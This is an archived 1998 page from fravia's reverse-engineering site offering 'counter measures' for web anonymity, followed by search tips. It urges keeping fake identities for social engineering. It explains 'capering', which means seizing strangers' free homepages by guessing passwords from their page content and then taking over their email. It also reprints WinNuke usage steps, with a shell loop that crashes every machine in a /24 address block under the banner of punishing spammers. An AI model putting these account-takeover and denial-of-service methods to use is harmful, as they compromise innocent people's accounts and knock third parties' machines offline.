O
U
M
E
S
fravia's
counter
measures
page
Fravia's Nofrill
Web design
(1998)
updated
July 1998
Fravia's Counter measures
| C O U M E S |
fravia's counter measures page Fravia's Nofrill Web design (1998) |
updated July 1998 |
Learn how to defend yourself (Some useful tricks)
|
|---|
let's hope it does not suck!
Based on some private emailings from +ORC
"...these days, on the Web, you'll never be too careful, travel always through your cloack identities and with your applets killer on, keep your cache empty, watch out for cookies and do not bump too oft on wizard sites... Work well, +ORC"
This page was started on 12 Nov 96 and is under slow construction
We have already seen on my anon page that Javascript applets can be used to forge faked address and other nasty activities on unsuspecting browsers... here is the code of LaDue's appletskiller
Having many identities (Avatars) is of paramount importance on the Web. You should use
faked identities for most activities, a good idea is to have identities in different
languages (say being a german law student, a french volleyball enthusiast, and an american
young Boy scout). You'll be able to get as many identities as you need using all the
services that provide (per telnet) email addresses for free, like hotmail.com... but a
much better (and raccomanded) method is the homepage capering I describe below. As soon as
you have your fake email address, set up a free web page (on Angelfire for instance, but
there are now many more free page providers on the Web, and you can get a 5 Megabyte free
page on many new free european providers). Be creative and use a "front" page
that would not arise any suspect (put up a nice foto you found somewhere on the Web with
"Me and my Dog Barkie" and this kind of junk stuff). Rememeber that the Web is
still growing exponentially and that MILLION of pages appear and disappear every DAY! No
censor's robot or spider can really follow what's going on (fortunately).
The Web is immense and the chances are on our side. If you only spent a minute per page
and devoted ten hours a day to it, it would take four and a half years to explore a
million Web pages, a lifetime to explore just a part of it, an automated search engine can
do the same in two days, but in the same time quite a lot of these pages will have been
changed/moved/migrated
Once you have some identities (say three or four) remember that:
- Your Avatars interests should be VERY different
- If possible the language you use should be different for each Avatar (if you know only
english use at least different language patterns, say university professor as A and lorry
driver as B)
What's the point of having many identities?
You'll need the AVatars to practicise some nice Web activities (offensive and defensive)
- enemy studying (see below)
- social engineering (if you need something or if you want to get more info about a
target)
- intranet activities (see below)
- homepage high capering (see below)
back to the
Homepages ("low") capering
For simple capering you do not even need a fake identity and you may practicize it on
many "easy" targets on the net. Capering is one of the best methods to conceal
your identity: use following approach:
- Find a free page provider with easy password validation scheme (say Angelfire, but also
Geocities and Mygale can be used)
- Read many pages of people that are NOT computer experts and that do NOT update very oft
(if ever)... you may be able to find the updating schedule on the free provider's pages.
- Let's say that the content of three such pages is the following: "Me and my dog Bertie", This page is a tribute to my nice daughter Simona" and "I love lollypops".
- Try "capering" these pages using as passwords, respectively, Bertie, Simona
and Lollypop.
You'll get -on average- one bingo out of 15 tryes. Now you got some pages belonging to
somebody else: do some of the following (mixing the points as needs be):
1) Do not change the page, change only the password and leave it alone for a couple of
months
and/or
2) Migrate immediatly to another location
and/or
3) Change password
and/or
4) Use the email address of the page owner to get other free pages by other providers
and/or
5) Kill the page you capered
and/or
6) Repeat the same procedure twice
Now you'll have some "capered" pages that you can more safely (but not
completely) use as
- "Depot" pages
- "Dormient" pages
- "Trap" (Luring) pages
For your own "intranet" (sort of, see below)
back to the top of this nice page
Know your enemies! (How to gather informations on the Web)
You'll find a first approach on the ad hoc
a nice fine c program (Winnuke) by _eci... listing at the end of this section
How to use WinNuke to get rid of spammers
winnuke.c is a program which will crash any Windows 95/NT machine. Since
this operating system is popular among spammers, winnuke makes it easy to
get rid of them.
First, take the program code from the bottom of this post (everything
after the ---Cut Here--- line) and save it to a text file called winnuke.c
on your shell account or Linux box.
Now compile it by typing:
gcc winnuke.c -o winnuke
If you have SunOS, you may need to use this command instead:
gcc winnuke.c -lsocket -lnsl -o winnuke
You should now have an executable program called winnuke in your directory.
Now find the spammer's IP number. This is the first IP number in the mail
headers which is not your mail server or mail relay. Once you have the
spammer's IP number (eg 192.168.12.109) type: ./winnuke 192.168.12.109
except use the spammer's real IP number that you found. You should see
something like the following:
% ./winnuke 192.168.12.109
Connected to [192.168.12.109:139].
Sending crash... Done!
%
Congratulations! You just nuked a spammer! Give yourself a pat on the
back. You can ping the IP address to verify that it is actually down.
If it doesn't work...
Unfortunately a few spammers don't have just one IP address but a whole
block (255 addresses) In this case you will need to nuke the entire block.
To do this, use this script:
#!/bin/csh
@ number = 255
loop:
@ number = $number - 1
./winnuke 205.199.212.$number &
#sleep 1
if ($number > 1) then
goto loop
endif
Except you should use the first three bytes of the spammer's IP number
instead of 205.199.212. If your net connection is too slow, uncomment the
sleep command (line 6) and that will slow it down so it can get all the
packets out. That's it...
nice, isn't it?
You believe that searching the web is just using AltaVista, Hotbot and the other search
engines? (Which you'll all find 
1) Searching per email, see my lessons:
Fravia's own lessons
lesson_5 ~ General use of agora,
http:// retrieving ~ July 1996 ~ complete
lesson_6 ~ Ftping files, agora
queries and emailing altavista ~ December 1996 ~ complete
lesson_7 ~ W3gate, search spiders,
error messages and evaluation of results ~ March 1997 ~ complete
lesson_8 ~ Advanced searching
techniques (combing and klebing) ~ November 1997 ~ complete
lesson_9 ~ Searching effectively ~
Site monitoring ~ January 1998 ~ complete
lesson_10 ~ Let the bots search for
you ~ and build your own search-bots :-) ~ June 1998 ~ 'light'
2) Searching through own robots/spiders, you'll find material on this here.
3) Using the searches that OTHERS have made! (combing)
I divide this field in "usenet combing" and "topsites combing"
I have started working on this in March 1997, and I don't think you'll find it somewhere
else!
(c) fravia :-)
Usenet combing is preferably made through simple email (never underestimate the
POWER of email for internet investigating matters):
To: Email-Queries@Reference.COM Subject: (None) Text: FIND search AND engines
Try it now, You'll get an answer in circa half an hour.
Another possibility is through an Agora's "news:" command:
To: agora@dna.affrc.go.jp Subject: (None) Text: send news:alt.anonymous
Try it now, You'll get an answer in circa 10 minutes.
Topsites combing is very useful to find quickly "delicate" subjects, like
warez and free "images". You don't do it obviously on newsgroups (where you'll
always find only an infinite list of "me-too" lusers). You'll go instead, for
instance straight to
Web-Counter
Where you'll have a look at the "Top 1000" pages
and Websidestory
The World Top
1000 Pages Where you'll have a look at the Top 1000 "hackers" page (for
instance).
The same applies for the "normal" search engines and for many other
"counters" on the web. As soon as you "see" a new counter somewhere,
check immediately if there is a "top 1000" option, and wade happily through tons
of information!
Enjoy!
back to the top of this nice page
Page unfinished, rough and under heavy construction since november 1996!
homepage links anonymity +ORC javascript wars academy database
bots' wars tools cocktails antismut CGI-scripts search forms mail fravia+
Is reverse engineering legal?